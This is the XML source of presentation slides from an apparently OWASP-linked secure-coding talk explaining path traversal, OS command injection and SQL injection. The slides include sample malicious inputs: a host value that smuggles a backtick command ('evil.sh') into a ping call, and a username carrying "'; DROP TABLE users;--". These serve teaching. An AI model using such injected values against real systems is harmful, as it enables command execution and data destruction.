              <a:rPr lang="en-US" dirty="0"/>
              <a:t>file.txt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89413106-322E-8547-B5C4-15B2FBE47466}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5718048" y="1348454"/>
            <a:ext cx="5715732" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="3600" dirty="0">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t>With Path Traversal, also known as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="3600" i="1" dirty="0">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t>dot dot slash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="3600" dirty="0">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t> attack, attackers can abuse a download link to access a file from a private directory.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13749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4209-20D8-7E49-816A-A5DCE54ED809}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537259" y="140434"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Content Creator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DD46D8D-1859-1543-AEAE-573E740D7D65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21540000">
            <a:off x="5494409" y="1597504"/>
            <a:ext cx="4078594" cy="4328299"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security Architect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ethical Hacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP Ottawa Chapter Co-Lead</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Passionate about software security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Secure Coding Dojo project leader </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@securecodedojo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D71FA922-07FB-C94E-AB0F-5AFDDF87D2F3}"/>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43000"/>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="21444853">
            <a:off x="3342554" y="1515692"/>
            <a:ext cx="1873783" cy="1873783"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3504349-7733-3D4E-80B6-9960B6BA3CBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21540000">
            <a:off x="3431023" y="3670638"/>
            <a:ext cx="2165663" cy="1213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Paul Ionescu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@pentesq</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="116492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1173608" y="211060"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OS Command Injection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1123584" y="1898137"/>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4358855"/>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16200000" flipV="1">
            <a:off x="1415371" y="3958618"/>
            <a:ext cx="794292" cy="6182"/>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1854253" y="3926523"/>
            <a:ext cx="3092321" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>host: ABC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>`evil.sh`</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C69CB740-A901-5543-BDCD-476BE2ED9A79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1266384" y="1582702"/>
            <a:ext cx="980910" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A78BE125-7A9C-A340-88FE-28FD17B9536A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3655849" y="1713471"/>
            <a:ext cx="1838132" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Operating System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Curved Connector 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3654963-812C-A340-828A-16DE80D8D158}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="4" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2495267" y="2731350"/>
            <a:ext cx="1390072" cy="2748"/>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CC6C9E-7DE0-134A-812B-79C33BC31255}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2476877" y="2398238"/>
            <a:ext cx="1408462" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> ABC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>`evil.sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51" name="Group 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56274B8A-335D-2B48-8F2A-F9464E60BD65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5735854" y="1483119"/>
            <a:ext cx="1565654" cy="968623"/>
            <a:chOff x="5598337" y="1740622"/>
            <a:chExt cx="1565654" cy="968623"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="31" name="Graphic 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14D3CD47-A8BE-FE44-934A-CEC254E66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8337" y="1740622"/>
              <a:ext cx="1159824" cy="968623"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="Rectangle 38">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E32DBF5B-A6D9-514A-9C58-D12A0123CE3E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5598337" y="1740622"/>
              <a:ext cx="1565654" cy="230832"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>&gt;_ ping ABC</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="53" name="Group 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08E4FC0B-F6B5-0F42-9245-357BDDE31023}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5735854" y="2808682"/>
            <a:ext cx="1565654" cy="968623"/>
            <a:chOff x="5598337" y="1740622"/>
            <a:chExt cx="1565654" cy="968623"/>
          </a:xfrm>
        </p:grpSpPr>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98337" y="1740622"/>
              <a:ext cx="1159824" cy="968623"/>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5598337" y="1740622"/>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grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="57" name="Straight Arrow Connector 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F087CD7-8702-7340-A1C9-392E7FCD58CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="31" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5128609" y="1967431"/>
            <a:ext cx="607245" cy="76666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D23FCCC-F540-4E47-B9FD-2AF69959CCE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="54" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5128609" y="2734098"/>
            <a:ext cx="607245" cy="558896"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FF000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A950698-BC74-594B-8707-84540191D50B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5787471" y="1739791"/>
            <a:ext cx="1168815" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F4F4F4"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ping: cannot resolve ABC: Unknown host</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F4F4F4"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Rectangle 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75676C7C-C38B-8446-BEB1-19FE8E2A9937}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5847000" y="3149535"/>
            <a:ext cx="1168815" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F4F4F4"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; : )</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3161" y="2152786"/>
            <a:ext cx="1157128" cy="1157128"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B84F840A-F422-5B45-ACC0-FA6C4F79161E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7353125" y="1486340"/>
            <a:ext cx="4061524" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="3200" dirty="0">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t>OS Command Injection lets attackers piggyback malicious scripts when programs execute shell commands.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3776469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0CC6C9E-7DE0-134A-812B-79C33BC31255}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2291858" y="2376861"/>
            <a:ext cx="3748559" cy="538609"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SELECT * FROM users WHERE user='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jsmith'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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2445000" y="510127"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL Injection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1123584" y="1898137"/>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4404801"/>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16200000" flipV="1">
            <a:off x="1392398" y="3981591"/>
            <a:ext cx="840238" cy="6182"/>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1854253" y="3928583"/>
            <a:ext cx="5209183" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>: jsmith</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'; DROP TABLE users;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>--'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C69CB740-A901-5543-BDCD-476BE2ED9A79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1266384" y="1582702"/>
            <a:ext cx="980910" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A78BE125-7A9C-A340-88FE-28FD17B9536A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5214275" y="1701099"/>
            <a:ext cx="2124043" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL Database Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Curved Connector 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3654963-812C-A340-828A-16DE80D8D158}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2379524" y="2624020"/>
            <a:ext cx="3393169" cy="12700"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:schemeClr val="tx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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{572399D8-748F-AC45-AD76-112D9DFA216B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5772693" y="2130846"/>
            <a:ext cx="1135507" cy="1196945"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="57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Curved Connector 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4995991-3603-3845-9807-F79F8C4F854B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2379524" y="2949600"/>
            <a:ext cx="3393169" cy="21046"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50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3713B9F-D68F-BB43-B597-5CDB227C7B17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3360898" y="2729318"/>
            <a:ext cx="1544012" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DROP TABLE users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Picture 26">
            <a:extLst>
